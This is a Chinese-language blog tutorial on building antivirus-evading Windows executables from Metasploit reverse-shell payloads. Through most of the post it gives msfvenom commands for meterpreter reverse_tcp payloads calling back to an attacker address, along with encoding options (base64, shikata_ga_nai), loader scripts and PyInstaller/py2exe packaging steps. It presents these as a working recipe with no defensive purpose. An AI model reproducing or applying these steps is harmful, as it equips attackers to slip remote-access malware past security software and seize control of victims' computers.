WEB渗透免杀篇-Python源码免杀

Base64编码+Pyinstaller打包

MSF监听需设置自动迁移进程

set autorunscript migrate -n explorer.exe
msfvenom -p windows/meterpreter/reverse_tcp --encrypt base64 LHOST=192.168.0.108 LPORT=12138 -f c -o /var/www/html/1.c

Shellcode粘贴在shellcode+base64+c.py中

python pyinstaller-script.py -F -w shellcode.py

会在目录下生成dist文件夹,exe文件就在里面

pyinstaller加载C代码编译

生成C格式payload MSF监听需设置自动迁移进程

set autorunscript migrate -n explorer.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f c -o /var/www/html/1.c

粘贴shellcode到shellcode+c.py中,在32位系统上安装python、py2exe、pyinstaller进入C:\Python27\Scripts目录使用命令把py打包为exe

python pyinstaller-script.py -F -w shellcode.py

会在目录下生成dist文件夹,exe文件就在里面

pyinstaller加载py代码编译

生成py格式payload MSF监听需设置自动迁移进程

set autorunscript migrate -n explorer.exe
msfvenom -p windows/meterpreter/reverse_tcp LPORT=12138 LHOST=192.168.0.108 -e x86/shikata_ga_nai -i 11 -f py -o /var/www/html/1.py

粘贴shellcode到shellcode+py.py中,在32位系统上安装python、py2exe、pyinstaller进入C:\Python27\Scripts目录使用命令把py打包为exe

python pyinstaller-script.py --console --onefile shellcode.py

会在目录下生成dist文件夹,exe文件就在里面

image

image

image

Py2exe打包exe
生成raw格式payload
MSF监听需设置自动迁移进程set autorunscript migrate -n explorer.exe
>msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f raw -o /var/www/html/shell.py
在32位系统上安装python、py2exe
创建setup.py放置同一目录

image

from distutils.core import setup
import py2exe
setup(
name = "Meter",
description = "Python-based App",
version = "1.0",
console = ["shell.py"],
options = {"py2exe":{"bundle_files":1,"packages":"ctypes","includes":"base64,sys,socket,struct,time,code,platform,getpass,shutil",}},
zipfile = None
)
执行打包命令
>python setup.py py2exe
会在当前目录生成dist文件夹,打包好的exe在里面

image

加载器分离

hex

生成c格式payload

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=192.168.0.108 lport=12138 -f c -o /var/www/html/shell.c

下载k8final

image

粘贴shellcode进去

image

使用

https://github.com/k8gege/scrun

image

或
>python scrun.py xxx
或
编译ScRunHex.py为exe
Base64( *)

生成c格式payload

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=192.168.0.108 lport=12138 -f c -o /var/www/html/shell.c
下载k8final

image

粘贴shellcode进去

image

进行hex编码后,粘贴进去base64编码

image

看系统位数编译ScRunBase.py文件,使用pyinstaller打包为exe后执行

https://gitee.com/RichChigga/scrun/blob/master/ScRunBase64.py
>python pyinstaller-script.py -F -w ScRunBase64.py

image

image

  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Python渗透源码是指用Python语言编写的用于网络渗透测试安全评估的工具或脚本的源代码。Python渗透测试领域非常流行,因为它具有简洁、易读、易学的特点,并且有丰富的第三方库和模块支持。 以下是一些常见的Python渗透工具和库的介绍: 1. Scapy:Scapy是一个强大的网络数据包处理库,可以用于构建、发送和解析网络数据包。它可以用于网络扫描、嗅探、欺骗等多种渗透测试任务。 2. Metasploit Framework:Metasploit是一个广泛使用的渗透测试框架,它提供了一系列的模块和工具,用于发现、利用和验证系统中的安全漏洞。 3. Requests:Requests是一个简洁而强大的HTTP库,可以用于发送HTTP请求和处理响应。在渗透测试中,可以使用Requests库来进行Web应用程序的漏洞扫描和攻击。 4. Paramiko:Paramiko是一个用于SSH协议的Python实现,可以用于远程执行命令、文件传输等操作。在渗透测试中,Paramiko可以用于通过SSH协议进行远程主机的渗透。 5. BeautifulSoup:BeautifulSoup是一个用于解析HTML和XML文档的库,可以用于从Web页面中提取数据。在渗透测试中,可以使用BeautifulSoup来分析和提取目标网站的敏感信息。 以上只是一些常见的Python渗透工具和库的介绍,实际上还有很多其他的工具和库可供使用。如果你对某个具体的工具或库感兴趣,可以提供更具体的信息,我可以为你提供更详细的源码介绍。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Pluto-2003

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值